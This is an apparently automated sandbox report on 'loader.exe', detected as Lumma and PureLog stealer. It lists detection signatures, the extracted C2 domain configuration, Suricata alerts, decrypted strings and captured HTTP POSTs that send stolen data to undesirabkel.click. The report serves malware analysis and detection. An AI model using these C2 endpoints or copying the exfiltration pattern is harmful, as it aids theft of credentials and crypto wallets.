Edit tour

Windows Analysis Report
loader.exe

Overview

General Information

Sample name:	loader.exe
Analysis ID:	1584534
MD5:	756cc98f850799fc6783bd07e91cab52
SHA1:	5e00f9dfdf3ebeeb9a7fa9177081704f200796cd
SHA256:	64a3d0f8623f9f27d8275349698641464a6d16295ece889c47611c9b84d90927
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loader.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: 756CC98F850799FC6783BD07E91CAB52)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

loader.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: 756CC98F850799FC6783BD07E91CAB52)

WerFault.exe (PID: 7480 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["undesirabkel.click", "rabidcowse.shop", "tirepublicerj.shop", "nearycrepso.shop", "noisycuttej.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop"], "Build id": "LPnhqo--hcjjgmpsojvf"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
loader.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1818004819.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000000.1694866108.0000000000552000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: loader.exe PID: 7388	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.loader.exe.550000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.loader.exe.3a19550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.loader.exe.3a19550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:05.273757+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:06.272985+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:07.385844+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-05T19:28:08.797316+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	188.114.97.3	443	TCP
2025-01-05T19:28:09.936606+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	188.114.97.3	443	TCP
2025-01-05T19:28:11.187401+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-05T19:28:12.489654+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-05T19:28:16.025216+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:05.774460+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:06.754386+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:16.531093+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49747	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:05.774460+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:06.754386+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:05.273757+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:06.272985+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:07.385844+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-05T19:28:08.797316+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	188.114.97.3	443	TCP
2025-01-05T19:28:09.936606+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	188.114.97.3	443	TCP
2025-01-05T19:28:11.187401+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-05T19:28:12.489654+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-05T19:28:16.025216+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49747	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:04.783111+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.4	59795	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:28:09.331455+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49737	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: loader.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://undesirabkel.click/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiunch_countnt5	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apilet	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apil	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/ab	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiU	Avira URL Cloud: Label: malware
Source: undesirabkel.click	Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.loader.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["undesirabkel.click", "rabidcowse.shop", "tirepublicerj.shop", "nearycrepso.shop", "noisycuttej.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop"], "Build id": "LPnhqo--hcjjgmpsojvf"}

Multi AV Scanner detection for submitted file

Source: loader.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Machine Learning detection for sample

Source: loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: undesirabkel.click
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--hcjjgmpsojvf

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_00419B52 CryptUnprotectData,

2_2_00419B52

Source: loader.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: loader.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: loader.exe, WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD5B9.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ecx, esi	2_2_0040A01E
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov edx, esi	2_2_0040A01E
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+edx-774985F5h]	2_2_0040A2AA
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+08h]	2_2_0043CB40
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0042FCB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042FCB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000870h]	2_2_0040CFC7
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov edx, eax	2_2_0040CFC7
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-0Ch]	2_2_0040AFA0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00430850
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-250B3304h]	2_2_0042A860
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00439060
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-18h]	2_2_00409000
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042F0C5
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then jmp eax	2_2_0042B8E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_004308B5
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ecx, eax	2_2_00444140
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0041B160
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp cx, dx	2_2_0043E101
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, word ptr [edx]	2_2_0043E101
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-33h]	2_2_0043E101
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then push ebx	2_2_0043D900
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], edi	2_2_00419102
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_00419102
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov esi, eax	2_2_0042810F
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-47E0A278h]	2_2_00440110
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042F131
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+5DB13D3Dh]	2_2_0040A9D4
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then push edi	2_2_004311E3
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004219E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+74h]	2_2_00409AD0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov edx, ecx	2_2_00409AD0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0041BC81
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-57DA02B1h]	2_2_004092F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ebx, eax	2_2_00405AB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ebp, eax	2_2_00405AB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov edx, dword ptr [esi+1Ch]	2_2_0041C34B
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0041C34B
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edx], cl	2_2_0041C34B
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then jmp eax	2_2_0042B8E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-12BF32F3h]	2_2_0042EB92
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp byte ptr [ebx+ecx+23h], 00000000h	2_2_0040ABA5
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov dword ptr [esi+14h], 00000000h	2_2_0040B460
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042C400
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042DC10
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00415C18
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov edi, eax	2_2_0042E4C0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ecx, eax	2_2_00428CE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp cl, 0000002Eh	2_2_00428CE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edi, word ptr [eax]	2_2_004274F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	2_2_004274F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-39h]	2_2_0041DC80
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov eax, ebx	2_2_0041DC80
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_00417485
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_00440490
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx-5999E81Dh]	2_2_004414B4
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041B4B9
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041B56E
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp dword ptr [edi+ecx*8], F68AC6D1h	2_2_00416517
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ecx, ebx	2_2_00416517
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then test esi, esi	2_2_0043DD20
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041FDE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00407610
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_00407610
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004156F7
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	2_2_004156F7
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-24138560h]	2_2_00443E80
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov ecx, eax	2_2_0041E700
Source: C:\Users\user\Desktop\loader.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_004307F7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:59795 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: undesirabkel.click
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: wholersorie.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3UMEY6OYJEU8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V85A0Z44FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8737Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WH5Y5RNV963AWZ7N4HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DLCVYOCL1FE28FIZF3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: undesirabkel.click
